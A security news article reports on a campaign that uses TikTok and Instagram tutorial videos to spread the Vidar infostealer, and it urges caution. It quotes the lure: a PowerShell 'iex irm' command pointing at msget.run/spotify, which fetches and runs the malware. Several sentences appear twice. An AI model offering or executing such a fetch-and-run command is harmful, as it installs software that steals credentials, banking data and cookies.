Beware of Scammers Using TikTok & Instagram for Vidar Infostealer Malware Spreads

Post Views: 15

Cybercriminals are leveraging TikTok and Instagram Reels to deploy Vidar infostealer malware, according to findings from threat intelligence firm ReversingLabs.

Attack Method and Social Media Tactics

The campaigns utilize social media engagement metrics to amplify malicious content, targeting users through deceptive video tutorials that promise access to premium software. The attack method involves creating accounts with branding resembling official entities, such as Windows, to build credibility.

According to findings from threat intelligence firm ReversingLabs.

Deceptive Video Tutorials

Videos feature polished visuals and automated voiceovers, guiding users to execute commands in PowerShell. One technique involves instructing viewers to input the command “iex irm” followed by a domain like msget.run/spotify. This action triggers the download of a file named build.exe, which contains the Vidar infostealer.

Exploiting User Curiosity

A secondary approach exploits user curiosity by posting videos showcasing premium app features set to trending music. Viewers are prompted to comment with specific keywords, after which attackers send direct messages containing malicious links.

Distribution via Social Media Algorithms

The videos gain traction through platform algorithms that prioritize content with high save and share rates, enabling widespread distribution. One analyzed clip amassed 109,000 views, 1,699 saves, and 974 shares.

Vidar Infostealer Overview

Vidar infostealer is available as a malware-as-a-service (MaaS) on underground markets, with a lifetime license priced at $300. It extracts sensitive data, including login credentials, banking information, and browser cookies. Recent updates have enhanced its stability and ability to bypass security measures. Attackers also remove warnings left by victims, complicating detection efforts.

Platform Response and Recommendations

ReversingLabs reported the malicious accounts to Instagram, but the platform declined to take action. Researchers emphasize that users should avoid executing unverified commands in terminal utilities. Organizations are advised to educate employees about risks hidden within consumer social media content.

ReversingLabs reported the malicious accounts to Instagram, but the platform declined to take action.

Researchers emphasize that users should avoid executing unverified commands in terminal utilities.

Evolving Threat Landscape

The study highlights the evolving tactics of threat actors, who shift focus from traditional phishing methods to social media-based deception. Experts warn that these campaigns may proliferate further, as users are less likely to scrutinize content labeled as helpful rather than overtly suspicious. Proactive awareness and technical safeguards remain critical defenses against such threats.

The study highlights the evolving tactics of threat actors, who shift focus from traditional phishing methods to social media-based deception.